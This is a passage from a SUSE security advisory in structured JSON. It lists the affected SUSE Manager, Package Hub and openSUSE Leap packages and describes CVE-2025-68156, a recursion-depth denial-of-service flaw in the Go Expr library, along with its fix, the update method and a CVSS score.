"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-61140"
},
{
"cve": "CVE-2025-68156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68156"
}
],
"notes": [
{
"category": "general",
"text": "Expr is an expression language and expression evaluation for Go. Prior to version 1.17.7, several builtin functions in Expr, including `flatten`, `min`, `max`, `mean`, and `median`, perform recursive traversal over user-provided data structures without enforcing a maximum recursion depth. If the evaluation environment contains deeply nested or cyclic data structures, these functions may recurse indefinitely until exceed the Go runtime stack limit. This results in a stack overflow panic, causing the host application to crash. While exploitability depends on whether an attacker can influence or inject cyclic or pathologically deep data into the\nevaluation environment, this behavior represents a denial-of-service (DoS) risk and affects overall library robustness. Instead of returning a recoverable evaluation error, the process may terminate unexpectedly. In affected versions, evaluation of expressions that invoke certain builtin functions on untrusted or insufficiently validated data structures can lead to a process-level crash due to stack exhaustion. This issue is most relevant in scenarios where Expr is used to evaluate expressions against externally supplied or dynamically constructed environments; cyclic references (directly or indirectly) can be introduced into arrays, maps, or structs; and there are no application-level safeguards preventing deeply nested input data. In typical use cases with controlled, acyclic data, the issue may not manifest. However, when present, the resulting panic can be used to reliably crash the application, constituting a denial of service. The issue has been fixed in the v1.17.7 versions of Expr. The patch introduces a maximum recursion depth limit for affected builtin functions. When this limit is exceeded, evaluation aborts gracefully and returns a descriptive error instead of panicking. Additionally, the maximum depth can be customized by users via `builtin.MaxDepth`, allowing applications with legitimate deep structures to raise the limit in a controlled manner. Users are strongly encouraged to upgrade to the patched release, which includes both the recursion guard and comprehensive test coverage to prevent regressions. For users who cannot immediately upgrade, some mitigations are recommended. Ensure that evaluation environments cannot contain cyclic references, validate or sanitize externally supplied data structures before passing them to Expr, and/or wrap expression evaluation with panic recovery to prevent a full process crash (as a last-resort defensive measure). These workarounds reduce risk but do not fully eliminate the issue without the patch.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68156",
"url": "https://www.suse.com/security/cve/CVE-2025-68156"
},
{
"category": "external",
"summary": "SUSE Bug 1255330 for CVE-2025-68156",
"url": "https://bugzilla.suse.com/1255330"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
